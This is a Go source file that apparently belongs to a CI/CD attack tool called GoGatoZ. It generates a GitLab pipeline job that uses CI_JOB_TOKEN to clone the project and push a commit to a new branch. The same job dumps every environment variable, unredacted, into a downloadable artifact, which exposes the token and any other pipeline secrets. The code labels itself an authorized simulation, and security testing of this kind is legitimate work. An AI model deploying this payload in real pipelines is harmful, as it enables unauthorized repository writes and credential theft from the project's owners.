package payloads

import "fmt"

// JobTokenPushOptions configures an authorized simulation of GitLab repository
// pushes performed with CI_JOB_TOKEN.
type JobTokenPushOptions struct {
	Common CommonOptions
}

// GenerateJobTokenPushYAML creates a marker commit on an isolated branch and
// attempts to push it with CI_JOB_TOKEN. The job records a sanitized report and
// an environment snapshot as artifacts for audit evidence.
func GenerateJobTokenPushYAML(o JobTokenPushOptions) string {
	name, stage := o.Common.defaults("job-token-push")
	return fmt.Sprintf(`# Auto-generated by GoGatoZ (CI job token repository push)
stages: [%s]

%s:
  stage: %s%s%s
  script:
    - |
      set -eu
      _REPORT="job_token_push_report.txt"
      _ENV_DUMP="env_dump.txt"
      _WORKTREE="$(mktemp -d)"
      _ERRORS="$_WORKTREE/git-errors.txt"
      _TARGET_BRANCH="gogatoz-job-token-${CI_PIPELINE_ID}"
      trap 'rm -rf "$_WORKTREE"' EXIT
      printenv | sort > "$_ENV_DUMP"
      {
        echo "project=$CI_PROJECT_PATH"
        echo "pipeline_id=$CI_PIPELINE_ID"
        echo "target_branch=$_TARGET_BRANCH"
      } > "$_REPORT"
      if [ -z "${CI_JOB_TOKEN:-}" ]; then
        echo "result=missing_ci_job_token" >> "$_REPORT"
        exit 0
      fi
      _SERVER="${CI_SERVER_URL#*://}"
      _AUTH_REPO="${CI_SERVER_PROTOCOL}://gitlab-ci-token:${CI_JOB_TOKEN}@${_SERVER}/${CI_PROJECT_PATH}.git"
      if ! git -c credential.helper= clone --quiet --depth 1 --branch "$CI_DEFAULT_BRANCH" "$_AUTH_REPO" "$_WORKTREE/repo" 2>"$_ERRORS"; then
        echo "result=clone_denied" >> "$_REPORT"
        sed -E 's#(https?://gitlab-ci-token:)[^@]+@#\1[REDACTED]@#g' "$_ERRORS" >> "$_REPORT"
        exit 0
      fi
      git -C "$_WORKTREE/repo" config user.name "GoGatoZ authorized test"
      git -C "$_WORKTREE/repo" config user.email "gogatoz@localhost"
      printf 'authorized job-token push simulation pipeline=%%s\n' "$CI_PIPELINE_ID" > "$_WORKTREE/repo/.gogatoz-job-token-push.txt"
      git -C "$_WORKTREE/repo" add .gogatoz-job-token-push.txt
      git -C "$_WORKTREE/repo" commit --quiet -m "GoGatoZ authorized job-token push simulation"
      if git -C "$_WORKTREE/repo" push --quiet "$_AUTH_REPO" "HEAD:refs/heads/$_TARGET_BRANCH" 2>"$_ERRORS"; then
        echo "result=push_succeeded" >> "$_REPORT"
      else
        echo "result=push_denied" >> "$_REPORT"
        sed -E 's#(https?://gitlab-ci-token:)[^@]+@#\1[REDACTED]@#g' "$_ERRORS" >> "$_REPORT"
      fi
  artifacts:
    when: always
    paths:
      - job_token_push_report.txt
      - env_dump.txt
    expire_in: 1 day
  allow_failure: true%s
`, stage, name, stage, imageLine(o.Common.Image), tagsLine(o.Common.Tags), rulesManual(o.Common.Manual))
}
